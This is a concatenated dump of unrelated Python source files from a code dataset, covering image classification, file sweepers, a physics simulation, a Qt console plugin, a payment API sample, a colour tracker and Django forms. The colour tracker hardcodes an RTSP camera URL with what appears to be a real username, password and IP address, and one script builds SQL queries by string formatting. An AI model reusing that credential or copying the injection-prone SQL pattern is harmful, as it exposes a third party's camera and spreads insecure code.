'seven', 'eight', 'nine', 'ZeroTH', 'OneTH', 'TwoTH', 'ThreeTH', 'FourTH', 'FiveTH', 'SixTH', 'SevenTH', 'EightTH', 'NineTH']\n con_mat = confusion_matrix(correct_Labels, Predicted_Labels,labels=label)\n print(con_mat)\n print(con_mat.shape)\n siz = con_mat.shape\n size = siz[0]\n total_pres = 0\n for i in range(size):\n total_pres = total_pres + (con_mat[i, i])\n print('Class accuracy '+str(i)+': '+str(con_mat[i, i] / float(np.sum(con_mat[i, :]))))\n print('total_accuracy : ' + str(total_pres/float(np.sum(con_mat))))\n df = pd.DataFrame (con_mat)\n filepath = excel_file_name\n df.to_excel(filepath, index=False)\n#correct_lables = matrix of true class of the test data\n#Predicted_labels = matrix of the predicted class\n\ndef showPic(img):\n cv2.imshow(\"show\",img)\n cv2.waitKey(0)\n\ndef deskew(img):\n m = cv2.moments(img)\n if abs(m['mu02']) < 1e-2:\n # no deskewing needed.\n return img.copy()\n # Calculate skew based on central momemts.\n skew = m['mu11']/m['mu02']\n # Calculate affine transform to correct skewness.\n M = np.float32([[1, skew, -0.5**skew], [0, 1, 0]])\n # Apply affine transform\n img = cv2.warpAffine(img, M, (60, 30), flags=cv2.WARP_INVERSE_MAP | cv2.INTER_LINEAR)\n return img\n\n\ndef HOG_int() :\n winSize = (20,20)\n blockSize = (10,10)\n blockStride = (5,5)\n cellSize = (10,10)\n nbins = 9\n derivAperture = 1\n winSigma = -1.\n histogramNormType = 0\n L2HysThreshold = 0.2\n gammaCorrection = 1\n nlevels = 64\n signedGradient = True\n hog = cv2.HOGDescriptor(winSize,blockSize,blockStride,cellSize,nbins,derivAperture,winSigma,histogramNormType,L2HysThreshold,gammaCorrection,nlevels, signedGradient)\n return hog\n\n# HOG parameters\nwinSize = (20,20)\nblockSize = (10,10)\nblockStride = (5,5)\ncellSize = (10,10)\nnbins = 9\nderivAperture = 1\nwinSigma = -1.\nhistogramNormType = 0\nL2HysThreshold = 0.2\ngammaCorrection = 1\nnlevels = 64\nsignedGradients = True\n\nhog = HOG_int()\nhog_descriptors = []\nlables = []\ntest_hog_descriptors = []\ntest_lables = []\nval_hog_descriptors = []\nval_lables = []\npath = 'C:\\\\Users\\\\MSI-GE72MVR-7RG\\\\PycharmProjects\\\\FIBO_project_Module8-9\\\\Dataset\\\\Tew\\\\Augmented_dataset\\\\'\ndirs = os.listdir(path)\n\n#Import test and training data\nfor files in dirs:\n a = files.split('_')\n d = a[len(a)-1]\n if d == 'train.txt':\n lab = a[len(a)-2]\n director = open('C:\\\\Users\\\\MSI-GE72MVR-7RG\\\\PycharmProjects\\\\FIBO_project_Module8-9\\\\Dataset\\\\Tew\\\\Augmented_dataset\\\\'+str(files),'r')\n data = director.read()\n director.close()\n data=data.split('\\n')\n data=data[:-1]\n num =0\n for x in data:\n lisss=x.split(',')\n img = np.array(list(lisss[:]))\n img = img.reshape(-1,(60))\n img = img.astype(np.uint8)*255\n num += 1\n img = deskew(img)\n hog_descriptors.append(hog.compute(img,winStride=(20,20)))\n lables.append(str(lab))\n print('appended train '+str(files))\n if d == 'test.txt':\n labs = a[len(a)-2]\n director = open('C:\\\\Users\\\\MSI-GE72MVR-7RG\\\\PycharmProjects\\\\FIBO_project_Module8-9\\\\Dataset\\\\Tew\\\\Augmented_dataset\\\\'+str(files),'r')\n data = director.read()\n director.close()\n data=data.split('\\n')\n data=data[:-1]\n num =0\n for x in data:\n lisss=x.split(',')\n img = np.array(list(lisss[:]))\n img = img.reshape(-1,(60))\n img = img.astype(np.uint8)*255\n num += 1\n img = deskew(img)\n test_hog_descriptors.append(hog.compute(img,winStride=(20,20)))\n test_lables.append(str(labs))\n print('appended test '+str(files))\n if d == 'validate.txt':\n labs = a[len(a)-2]\n director = open('C:\\\\Users\\\\MSI-GE72MVR-7RG\\\\PycharmProjects\\\\FIBO_project_Module8-9\\\\Dataset\\\\Tew\\\\Augmented_dataset\\\\'+str(files),'r')\n data = director.read()\n director.close()\n data=data.split('\\n')\n data=data[:-1]\n num =0\n for x in data:\n lisss=x.split(',')\n img = np.array(list(lisss[:]))\n img = img.reshape(-1,(60))\n img = img.astype(np.uint8)*255\n num += 1\n img = deskew(img)\n val_hog_descriptors.append(hog.compute(img,winStride=(20,20)))\n val_lables.append(str(labs))\n print('appended test '+str(files))\nhog_descriptors = np.squeeze(hog_descriptors)\nlables = np.squeeze(lables)\ntest_hog_descriptors = np.squeeze(test_hog_descriptors)\ntest_lables = np.squeeze(test_lables)\nval_hog_descriptors = np.squeeze(val_hog_descriptors)\nval_lables = np.squeeze(val_lables)\n\nprint('Begining feature selection...')\n#feature selection\nforest = ExtraTreesClassifier()\nforest.fit(hog_descriptors, lables)\nmodeltree = SelectFromModel(forest,prefit=True)\nX_new = modeltree.transform(hog_descriptors)\ntest_new = modeltree.transform(test_hog_descriptors)\nprint('Begining Knn fitting...')\nneigh = KNeighborsClassifier(n_neighbors=10)\nneigh.fit(X_new, lables)\njoblib.dump(neigh, 'C:\\\\Users\\\\MSI-GE72MVR-7RG\\\\PycharmProjects\\\\FIBO_project_Module8-9\\\\Don\\'t mess with me\\\\knn_model_gen.pkl')\nprint('Model saved!')\npred = neigh.predict(test_new)\nprint('predicted....')\nprint(pred.shape)\nprint('Generate confusion matrix...')\nconfusionMat(test_lables, pred , 'Gen_log.xlsx')\n","sub_path":"Don't mess with me/Hog example gen.py","file_name":"Hog example gen.py","file_ext":"py","file_size_in_byte":5902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"521736287","text":"\n\"\"\"\nThis module contains the definitions of Sagittariidae's sweeper processes.\nThese are asynchronous processes that designed to drive the current state of\nthe world to a desired final state.\n\nThe sweepers are run as processes separate from the webservice. They may be\ninvoked by name by executing this module, typically from a scheduler such as\n`cron`.\n\"\"\"\n\nimport os\nimport shutil\nimport sys\n\nfrom . import app as sagittariidae\nfrom . import models\n\n\nlogger = sagittariidae.app.logger\n\nclass Sweeper(object):\n\n def run(self):\n raise NotImplementedError()\n\n def sweep(self):\n try:\n self.run()\n except Exception as e:\n logger.error('Unhandled exception in sweeper %s', self, exc_info=e)\n\n\nclass ArchivedFileDirSweeper(Sweeper):\n\n def _clean_(self, ssf, logger):\n config = sagittariidae.app.config\n src_path = os.path.join(config['UPLOAD_PATH'], ssf.relative_source_path)\n src_dir = os.path.dirname(src_path)\n if os.path.exists(src_dir):\n logger.info('Removing upload directory: %s' % src_dir)\n shutil.rmtree(src_dir)\n else:\n logger.warning('Upload directory doesn\\'t exist: %s' % src_dir)\n # FIXIT: Handle the OperationalError that may result if the database is\n # locked. It's not a critical failure, but spurious ERROR messages in\n # the log is never nice.\n ssf.mark_cleaned()\n\n def run(self):\n logger = sagittariidae.app.logger\n\n files = models.get_files(\n sample_stage_id=None,\n status=models.FileStatus.archived)\n logger.info('Found upload director{y,ies} for %d files(s) that are ready to be cleaned: %s', len(files), files)\n for f in files:\n try:\n self._clean_(f, logger)\n except Exception as e:\n logger.error('Error cleaning upload directory for file %s', f, exc_info=e)\n\n\nclass StagedFileSweeper(Sweeper):\n\n def _complete_(self, ssf):\n config = sagittariidae.app.config\n src_path = os.path.join(config['UPLOAD_PATH'], ssf.relative_source_path)\n tgt_path = os.path.join(config['STORE_PATH'], ssf.relative_target_path)\n tgt_dir = os.path.dirname(tgt_path)\n if not os.path.isdir(tgt_dir):\n os.makedirs(tgt_dir)\n shutil.copy(src_path, tgt_path)\n logger.info('Copied file: %s -> %s', src_path, tgt_path)\n ssf.mark_archived()\n\n def run(self):\n logger = sagittariidae.app.logger\n\n files = models.get_files(\n sample_stage_id=None,\n status=models.FileStatus.staged)\n logger.info('Found %d file(s) that are ready to be moved into place: %s', len(files), files)\n for f in files:\n try:\n self._complete_(f)\n except Exception as e:\n logger.error('Error moving file %s', f, exc_info=e)\n\n\ndef make_sweeper(c):\n try:\n if c == Sweeper:\n raise Exception('Not a sweeper impl %s' % c)\n i = c()\n if not isinstance(i, Sweeper):\n raise Exception('%s is not an implementation of %s' % (c, Sweeper))\n else:\n return i\n except Exception as e:\n logger.error('Invalid sweeper class %s', sys.argv[1], exc_info=e)\n raise e\n\n\nif __name__ == '__main__':\n make_sweeper(globals().get(sys.argv[1])).sweep()\n","sub_path":"app/sweepers.py","file_name":"sweepers.py","file_ext":"py","file_size_in_byte":3400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"612387101","text":"#!/usr/bin/python\nimport sys\nimport MySQLdb\nfrom config import sqlhost,sqluser,sqlpasswd,sqldb\nfrom gene2paths import gene2paths\n\ndef table2dict(lines):\n colnames = lines[0].strip(\"\\n\").split('\\t')\n colnums = len(colnames)\n dict_out = {}\n for item in colnames:\n dict_out[item] =[]\n for line in lines[1:]:\n i = 0\n items = line.strip('\\n').split('\\t')\n for item in items:\n dict_out[colnames[i]].append(item)\n i = i + 1\n return dict_out\n\ndef ToAllnum(vs):\n num = len(vs) - 1\n return num\n\ndef ToExonum(vs):\n head = vs[0]\n bosy = vs[1:]\n region_idx = head.index(\"Region\")\n exonum = 0\n for v in bosy:\n if v[region_idx] == \"exonic\": \n exonum = exonum + 1\n return exonum\n\ndef ToGenenum(vs):\n head = vs[0]\n bosy = vs[1:]\n gene_idx = head.index(\"Gene\")\n genes = set()\n for v in bosy:\n if v[gene_idx] != \"\":\n genes.add(v[gene_idx])\n genenum = len(genes)\n return genenum\n\ndef ToPathnum(vs):\n head = vs[0]\n bosy = vs[1:]\n gene_idx = head.index(\"Gene\")\n genes = set()\n paths = []\n for v in bosy:\n if v[gene_idx] != \"\":\n genes.add(v[gene_idx])\n for gene in genes:\n try:\n pathways = gene2paths[gene]\n paths.extend(pathways)\n except:\n pass\n paths = set(paths)\n pathnum = len(paths)\n return pathnum\n\ndef anno2sqlnums(anno,sample_no):\n vs = []\n fp = open(anno)\n for v in fp:\n items = v.strip(\"\\n\").split(\"\\t\")\n vs.append(items)\n \n genome_variant_num = ToAllnum(vs)\n exo_variant_num = ToExonum(vs)\n genes_num = ToGenenum(vs)\n paths_num = ToPathnum(vs)\n#############get from mysql###################\n conn = MySQLdb.connect(host=sqlhost,user=sqluser,passwd=sqlpasswd,db=sqldb)\n cursor = conn.cursor()\n update_stage = \"update sample_info set stage = 3 where sample_no = %s \" % sample_no\n sql3_insert = \"insert into variant_data_nums (sample_no,genome_variant,exonic_variant,genes,pathways) values (%s,%s,%s,%s,%s)\" % (sample_no,genome_variant_num,exo_variant_num,genes_num,paths_num)\n sql3_update = \"update variant_data_nums set genome_variant=%s,exonic_variant=%s,genes=%s,pathways=%s where sample_no = %s\" % (genome_variant_num,exo_variant_num,genes_num,paths_num,sample_no)\n try:\n\t cursor.execute(sql3_insert)\n except:\n\t cursor.execute(sql3_update)\n cursor.execute(update_stage)\n cursor.close()\n conn.commit()\n conn.close()\n\n\n","sub_path":"seq-service/anno2arrange/anno2sqlnums/anno2sqlnums.py","file_name":"anno2sqlnums.py","file_ext":"py","file_size_in_byte":2608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"40142203","text":"\nfrom matplotlib import pyplot\nfrom numpy import linalg as la\nimport kwant\nimport numpy as np\nimport scipy.sparse.linalg as sla\nimport matplotlib.pyplot as plt\n\nf_nm2au = 18.89726133921252\nf_eV2au = 0.03674932587122423\nf_B2au=4.254382E-6\n\ndef onsite_e(sitei, dx, t, mu, delta):\n return -mu\ndef onsite_h(sitei, dx, t, mu, delta):\n return mu\n\ndef hopping_electron(sitei, sitej, dx, t, mu, delta):\n return -t\n\ndef hopping_hole(sitei, sitej, dx, t, mu, delta):\n return t\n\ndef hopping_electron_hole_minus(sitei, sitej, dx, t, mu, delta):\n return -delta\n\ndef hopping_electron_hole_plus(sitei, sitej, dx, t, mu, delta):\n return delta\n\n# def hopping_hole_electron_minus(sitei, sitej, dx, t, mu, delta):\n# return delta\n#\n# def hopping_electron_hole_minus(sitei, sitej, dx, t, mu, delta):\n# return -delta\n\ndef make_system(L, dx, t, mu, delta):\n sys = kwant.Builder()\n lat_e = kwant.lattice.chain(dx, name=\"e\")\n lat_h = kwant.lattice.chain(dx, name=\"h\")\n\n sys[(lat_e(i) for i in range(L))] = onsite_e\n sys[(lat_h(i) for i in range(L))] = onsite_h\n # sys[lat_e.neighbors()] = hopping\n # sys[lat_h.neighbors()] = hopping\n sys[kwant.builder.HoppingKind((1,), lat_e, lat_h)] = hopping_electron_hole_plus\n # sys[kwant.builder.HoppingKind((1,), lat_h, lat_e)] = hopping_hole_electron\n sys[kwant.builder.HoppingKind((1,), lat_e, lat_e)] = hopping_electron\n sys[kwant.builder.HoppingKind((1,), lat_h, lat_h)] = hopping_hole\n # sys[kwant.builder.HoppingKind((-1,), lat_e, lat_h)] = hopping_electron_hole\n sys[kwant.builder.HoppingKind((-1,), lat_e, lat_h)] = hopping_electron_hole_minus\n sys[kwant.builder.HoppingKind((-1,), lat_e, lat_e)] = hopping_electron\n sys[kwant.builder.HoppingKind((-1,), lat_h, lat_h)] = hopping_hole\n\n sys = sys.finalized()\n return sys\n\n\n###### CALCULATE AND PLOT ENERGY SPECTRUM\nf = open('data.dat', 'w')\nt = 1\nL = 25\ndx = 0.1*f_nm2au\ndelta = t\nsteps = 200\nmu = 1\nsys = make_system(L, dx, t, mu, delta)\n\ndata_files = []\ndata_files_v = []\nfor i in range(2*L):\n data_files.append(open(\"dane/data%d.dat\" % (i), 'w'))\n\n\nfor i in range(steps):\n data_files_v.append(open(\"dane/v/data%d.dat\" % (i), 'w'))\n mu = t*4.0*i/steps # mu/t : [0; 3]\n\n print(\"delta = %e\\n mu = %e\\n mu/t = %e\" % (delta, mu, mu/t))\n\n ham_mat = sys.hamiltonian_submatrix(args=[dx,t, mu, delta], sparse=False)\n e, v = la.eigh(ham_mat)\n sites= sys.sites # funckaj ktora zwraca poszczegolne wezly\n psi= dict(zip(sites, v[:,49])) #gny chcemy stan zero\n print(len(v))\n psi_m = dict(zip(sites, v[:,L]))\n lat_e = kwant.lattice.chain(dx, name=\"e\")\n lat_h = kwant.lattice.chain(dx, name=\"h\")\n x_s = []\n ground = []\n majorana = []\n for w in range(L):\n # data_files_v[i].write(\"%e\")\n x_s.append(w)\n ground.append(np.abs(psi[lat_e(w)].real + psi[lat_e(w)].imag)**2 + np.abs(psi[lat_h(w)].real + psi[lat_h(w)].imag)**2)\n majorana.append(np.abs(psi_m[lat_e(w)].real)**2 + np.abs(psi_m[lat_h(w)].real)**2)\n data_files[w].write(\"%e %e\\n\" % (mu/t, e[w]/t))\n # f.write(\"%e %e\\n\" % (i*dx, np.abs(psi[lat(i)] )))\n # plt.plot(np.abs(psi[lat(i)]))\n # plt.show()\n for l in range(L):\n data_files[L+l].write(\"%e %e\\n\" % (mu/t, -e[l]/t))\n for j in range(L):\n data_files_v[i].write(\"%e %e\\n\" % (x_s[j], majorana[j]))\n\n\n# mu = 2.5\n# ham_mat = sys.hamiltonian_submatrix(args=[dx,t, mu, delta], sparse=False)\n# e, v = la.eigh(ham_mat)\n# sites= sys.sites\n# lat_e = kwant.lattice.chain(dx, name=\"e\")\n# lat_h = kwant.lattice.chain(dx, name=\"h\")\n# lat = lat_e\n# # knocks = []\n# # for i in range(L):\n# # knocks.append(lat_e(i))\n# # for i in range(L):\n# # knocks.append(lat_h(i))\n#\n# ##### SAVE wave function of the state corresponding to the pair of Majorana modes\n# majorana_data = open('majorana_data.dat', 'w')\n# psi= dict(zip(sites, v[:,L]))\n# for i in range(L):\n# majorana_data.write(\"%e %e\\n\" % (i,np.abs(psi[lat_e(i)].real)**2 + np.abs(psi[lat_h(i)].real)**2))\n#\n# ##### SAVE wave function of the first excited state\n# majorana_data = open('first_state.dat', 'w')\n# psi= dict(zip(sites, v[:,1]))\n# for i in range(L):\n# majorana_data.write(\"%e %e\\n\" % (i,np.abs(psi[lat(i)].real)))\n","sub_path":"playground/2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"252982406","text":"from core.plugin import Plugin\nfrom ..window.main import MainWindowPlugin\nfrom .interactive_console import InteractiveConsole\nfrom .interactive_console_widget import InteractiveConsoleWidget\n\nfrom PyQt5.Qt import Qt\nfrom PyQt5.QtWidgets import QDockWidget, QShortcut\n\nimport io\nfrom contextlib import redirect_stdout\n\n\nclass InteractiveConsolePlugin(Plugin):\n locals = None\n\n def __init__(self, main_window_plugin: MainWindowPlugin):\n super().__init__()\n\n self.main_window = main_window_plugin.main_window\n\n self.console_widget = InteractiveConsoleWidget()\n self.console_widget.command_entered.connect(self.on_command_entered)\n self.interactive_console = self.create_console()\n\n self.dock_widget = QDockWidget('Interactive Console')\n self.dock_widget.setWidget(self.console_widget)\n self.dock_widget.hide()\n\n self.shortcut = QShortcut(Qt.CTRL + Qt.Key_Greater, self.main_window)\n\n def _install(self):\n self.main_window.addDockWidget(Qt.BottomDockWidgetArea, self.dock_widget)\n self.shortcut.activated.connect(self.on_shortcut_activated)\n\n def _remove(self):\n self.shortcut.activated.disconnect(self.on_shortcut_activated)\n self.main_window.removeDockWidget(self.dock_widget)\n\n # Remove all created references (otherwise some plugins may not be deleted)\n self.interactive_console.reset_locals()\n\n def create_console(self):\n return InteractiveConsole(self.locals.copy(), self.console_widget.append_output)\n\n def reset_console(self):\n self.interactive_console = self.create_console()\n\n def on_command_entered(self, command_text):\n stdout = io.StringIO()\n with redirect_stdout(stdout):\n more_input_required = self.interactive_console.push(command_text)\n\n output_text = stdout.getvalue()\n if output_text.endswith('\\n'): # enter was redirected to stdout too, so we need to remove it\n output_text = output_text[:-1]\n if output_text:\n self.console_widget.append_output(output_text)\n print('InteractiveConsole >', output_text)\n\n self.console_widget.set_continue_input_prompt(more_input_required)\n\n def on_shortcut_activated(self):\n self.dock_widget.show()\n self.console_widget.focus_command_line()\n","sub_path":"image_vision/plugins/interactive_console/interactive_console_plugin.py","file_name":"interactive_console_plugin.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"68793622","text":"import os, sys\nimport imp\n\nfrom authorizenet import apicontractsv1\nfrom authorizenet.apicontrollers import *\nconstants = imp.load_source('modulename', 'constants.py')\nfrom decimal import *\nfrom authorizenet.apicontractsv1 import bankAccountType, accountTypeEnum\n\ndef credit_bank_account():\n\tmerchantAuth = apicontractsv1.merchantAuthenticationType()\n\tmerchantAuth.name = constants.apiLoginId\n\tmerchantAuth.transactionKey = constants.transactionKey\n\n\n\tpayment = apicontractsv1.paymentType()\n\n\tbankAccountType = apicontractsv1.bankAccountType()\n\taccountType = apicontractsv1.bankAccountTypeEnum\n\tbankAccountType.accountType = accountType.checking\n\tbankAccountType.routingNumber = \"125000024\"\n\tbankAccountType.accountNumber = \"12345678\"\n\tbankAccountType.nameOnAccount = \"John Doe\"\n\n\ttransactionrequest = apicontractsv1.transactionRequestType()\n\ttransactionrequest.transactionType = \"refundTransaction\"\n\ttransactionrequest.amount = Decimal ('2.55')\n\ttransactionrequest.payment = payment\n\ttransactionrequest.payment.bankAccount = bankAccountType\n\n\n\tcreatetransactionrequest = apicontractsv1.createTransactionRequest()\n\tcreatetransactionrequest.merchantAuthentication = merchantAuth\n\tcreatetransactionrequest.refId = \"MerchantID-0001\"\n\n\tcreatetransactionrequest.transactionRequest = transactionrequest\n\tcreatetransactioncontroller = createTransactionController(createtransactionrequest)\n\tcreatetransactioncontroller.execute()\n\n\tresponse = createtransactioncontroller.getresponse()\n\n\tif (response.messages.resultCode==\"Ok\"):\n\t print (\"Transaction ID : %s\" % response.transactionResponse.transId)\n\t print (response.transactionResponse.messages.message[0].description)\n\telse:\n\t print (\"response code: %s\" % response.messages.resultCode)\n\t print (response.messages.message[0]['text'].text)\n\n\treturn response\n\nif(os.path.basename(__file__) == os.path.basename(sys.argv[0])):\n\tcredit_bank_account()\n","sub_path":"PaymentTransactions/credit-bank-account.py","file_name":"credit-bank-account.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"52755319","text":"from django.shortcuts import render_to_response, HttpResponseRedirect\nfrom django.template import RequestContext\nfrom django import forms\nfrom ajax_select.fields import AutoCompleteField\n\nfrom . forms import GroupForm, PersonForm\n\n\nclass SearchForm(forms.Form):\n q = AutoCompleteField(\n 'member',\n required=True,\n help_text=\"autocomplete\",\n label=\"member\",\n attrs={'size': 100}\n )\n\n\ndef create_group(request):\n dd = {}\n if 'q' in request.GET:\n dd['entered'] = request.GET.get('q')\n initial = {'q': \"enter your new member\"}\n form = SearchForm(initial=initial)\n dd['form'] = form\n\n if request.method == 'POST':\n form = GroupForm(request.POST)\n if form.is_valid():\n group = form.save()\n group.save()\n return HttpResponseRedirect('.')\n else:\n form = GroupForm()\n return render_to_response('example/create_group.html', {'form': form, 'dd': dd}, context_instance=RequestContext(request))\n\n\ndef create_person(request):\n if request.method == 'POST':\n form = PersonForm(request.POST)\n if form.is_valid():\n person = form.save()\n person.save()\n return HttpResponseRedirect('.')\n else:\n form = PersonForm()\n return render_to_response('example/create_person.html', {'form': form}, context_instance=RequestContext(request))\n","sub_path":"example/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"217258622","text":"#!/usr/bin/env python3\n\n# Created by: Manuel Garcia Yuste\n# Created on : December 2019\n# This program finds the average of all elements in a 2d list\n\n\nimport random\n\n\ndef calculator(dimensional_list, rows, columns):\n # this finds the average of all elements in a 2d list\n\n total = 0\n for row_value in dimensional_list:\n for single_value in row_value:\n total += single_value\n total = total/(rows*columns)\n\n return total\n\n\ndef main():\n # this function places random integers into a 2D list\n dimensional_list = []\n\n # Input\n rows = (input(\"How many rows would you like: \"))\n columns = (input(\"How many columns would you like: \"))\n try:\n # Process\n rows = int(rows)\n columns = int(columns)\n for rows_loop in range(0, rows):\n temp_column = []\n for column_loop in range(0, columns):\n random_int = random.randint(1, 50)\n temp_column.append(random_int)\n\n # Output 1\n print(\"Random Number \" + str(rows_loop + 1) + \", \"\n + str(column_loop + 1) + \" is \" + str(random_int))\n dimensional_list.append(temp_column)\n print(\"\")\n\n # Output 2\n averaged = calculator(dimensional_list, rows, columns)\n print(\"The average of the random numbers is: {0} \".format(averaged))\n\n except Exception:\n print(\"Invalid input\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"2d_list.py","file_name":"2d_list.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"566466169","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n\nfrom .task_factory_base import TaskFactoryBase\n\n\nclass FileCollectionTaskFactory(TaskFactoryBase):\n \"\"\"A Task Factory for generating a set of tasks based on the contents\n of an Azure Storage container or auto-storage file group. One task\n will be generated per input file, and automatically added to the job.\n\n :param source: The input file source from which the tasks will be generated.\n :type source: :class:`FileSource `\n :param repeat_task: The task template the will be used to generate each task.\n :type repeat_task: :class:`RepeatTask `\n :param merge_task: An optional additional task to be run after all the other\n generated tasks have completed successfully.\n :type merge_task: :class:`MergeTask `\n \"\"\"\n\n _validation = {\n 'type': {'required': True},\n 'source': {'required': True},\n 'repeat_task': {'required': True}\n }\n\n _attribute_map = {\n 'type': {'key': 'type', 'type': 'str'},\n 'source': {'key': 'source', 'type': 'FileSource'},\n 'repeat_task': {'key': 'repeatTask', 'type': 'RepeatTask'},\n 'merge_task': {'key': 'mergeTask', 'type': 'MergeTask'}\n }\n\n def __init__(self, *, source: str, repeat_task, merge_task=None, **kwargs) -> None:\n super(FileCollectionTaskFactory, self).__init__(\n merge_task=merge_task, **kwargs)\n self.source = source\n self.repeat_task = repeat_task\n self.type = 'taskPerFile'\n","sub_path":"azext/batch/models/file_collection_task_factory_py3.py","file_name":"file_collection_task_factory_py3.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"402581429","text":"import cv2\nimport numpy as np\nfrom collections import deque\nimport sys\nfrom scipy.misc import imread\nfrom scipy.linalg import norm\nfrom scipy import sum, average\nfrom PIL import Image\nimport PIL\n\ndef cmp_main():\n file1='/home/ganesh/Desktop/imgcrp.jpg'\n file2 =\"/home/ganesh/Desktop/UntitledFolder3/temp.jpg\"\n # read images as 2D arrays (convert to grayscale for simplicity)\n img1 = to_grayscale(imread(file1).astype(float))\n img2 = to_grayscale(imread(file2).astype(float))\n # compare\n n_m, n_0 = compare_images(img1, img2)\n #print(\"Manhattan norm:\", n_m, \"/ per pixel:\", n_m/img1.size)\n #print(\"Zero norm:\", n_0, \"/ per pixel:\", n_0*1.0/img1.size)\n return n_m\n\ndef compare_images(img1, img2):\n # normalize to compensate for exposure difference\n img1 = normalize(img1)\n img2 = normalize(img2)\n # calculate the difference and its norms\n diff = img1 - img2 # elementwise for scipy arrays\n m_norm = sum(abs(diff)) # Manhattan norm\n z_norm = norm(diff.ravel(), 0) # Zero norm\n return (m_norm, z_norm)\n\ndef to_grayscale(arr):\n \"If arr is a color image (3D array), convert it to grayscale (2D array).\"\n if len(arr.shape) == 3:\n return average(arr, -1) # average over the last axis (color channels)\n else:\n return arr\n\ndef normalize(arr):\n rng = arr.max()-arr.min()\n amin = arr.min()\n return (arr-amin)*255/rng\n\n\np1=[67,43,160]\np2=[119,255,255]\ncap=cv2.VideoCapture(\"rtsp://admin:admin0864@121.6.207.205:8081/cam/realmonitor?channel=1&subtype=1\")\n\nwhile(cap.isOpened()):\n ret,frame=cap.read()\n if ret==True:\n cv2.namedWindow('VIDEO',cv2.WINDOW_NORMAL)\n cv2.imshow('VIDEO', frame)\n cv2.resizeWindow('VIDEO', 600,600)\n cv2.imwrite('v_image.jpg',frame)\n img=cv2.imread('v_image.jpg')\n hsv=cv2.cvtColor(img,cv2.COLOR_BGR2HSV)\n\n lower=np.array(p1,dtype=np.uint8)\n upper=np.array(p2,dtype=np.uint8)\n mask=cv2.inRange(hsv,lower,upper)\n mask=cv2.GaussianBlur(mask,(3,3),0)\n res=cv2.bitwise_and(img,img,mask=mask)\n (__,cnts,__)=cv2.findContours(mask.copy(),cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n\n if len(cnts)>0:\n cnt=sorted(cnts,key=cv2.contourArea,reverse=True)[0]\n rect=cv2.minAreaRect(cnt)\n box=cv2.boxPoints(rect)\n box=np.int0(box)\n cv2.drawContours(img,[box],-1,(0,255,0),2)\n cv2.namedWindow('Tracking',cv2.WINDOW_NORMAL)\n cv2.imshow('Tracking', img)\n cv2.resizeWindow('Tracking', 600,600)\n W=rect[1][0]\n H=rect[1][1]\n xs=[i[0] for i in box]\n ys=[i[1] for i in box]\n x1=min(xs)\n x2=max(xs)\n y1=min(ys)\n y2=max(ys)\n rotated=False\n angle=rect[2]\n if(angle<-45):\n angle=angle+90\n rotated=True\n center = (int((x1+x2)/2),int((y1+y2)/2))\n size=(int(x2-x1),int(y2-y1))\n #cv2.circle(img,center,10,(0,255,0),-1)\n M=cv2.getRotationMatrix2D((size[0]/2,size[1]/2),angle,1.0)\n cropped=cv2.getRectSubPix(img,size,center)\n cropped=cv2.warpAffine(cropped,M,size)\n croppedW=W if not rotated else H\n croppedH=H if not rotated else W\n croppedRotated=cv2.getRectSubPix(cropped,(int(croppedW),int(croppedH)),(size[0]/2,size[1]/2))\n '''\n cv2.imwrite('/home/ganesh/Desktop/crprot1.jpg',croppedRotated)\n img = Image.open('/home/ganesh/Desktop/crprot1.jpg')\n img = img.resize((560, 234), PIL.Image.ANTIALIAS)\n img.save('/home/ganesh/Desktop/imgcrp.jpg')\n ck=cmp_main()\n if ck<7400000:\n '''\n cv2.imshow('cropped',croppedRotated)\n if cv2.waitKey(1)&0xFF ==ord('q'):\n break\n \ncv2.destroyAllWindows()\n\n\n\n\n","sub_path":"un_main_ck.py","file_name":"un_main_ck.py","file_ext":"py","file_size_in_byte":3929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"384837787","text":"from django import forms\nfrom .models import Category, Sub_Category, Product, Brand\nfrom django.core.exceptions import ValidationError\n\nclass AddCat(forms.ModelForm):\n class Meta:\n model = Category\n fields = ('name', 'image')\n labels = {\n 'name' : 'Category Name',\n 'image': 'Choose a custom image',\n }\n widgets = {\n 'name': forms.TextInput(attrs={'class':'form-control', 'placeholder':'Category Name'}),\n 'image': forms.FileInput(attrs={'class':'form-control', 'placeholder':'Category Name'}),\n }\n def clean_name(self):\n data = self.cleaned_data['name']\n try:\n check = data.lower()\n same = Category.objects.get(name = check)\n except:\n return data\n raise ValidationError('This Category is added already')\n \n\nclass AddSubCat(forms.ModelForm):\n \n class Meta:\n model = Sub_Category\n fields = ('sub_name', 'category', 'image')\n widgets = {\n 'sub_name': forms.TextInput(attrs={'class':'form-control', 'placeholder':'Sub Category Name'}),\n 'category': forms.Select(attrs={'class':'form-control', 'placeholder':'Category Name'}),\n 'image': forms.FileInput(attrs={'class':'form-control', 'placeholder':'Category Name'}),\n }\n \n \nclass AddBrand(forms.ModelForm):\n class Meta:\n model = Brand\n fields = ('brand_name', )\n widgets = {\n 'brand_name': forms.TextInput(attrs={'class':'form-control', 'placeholder':'Brand Name'}),\n }\n def clean_brand_name(self):\n data = 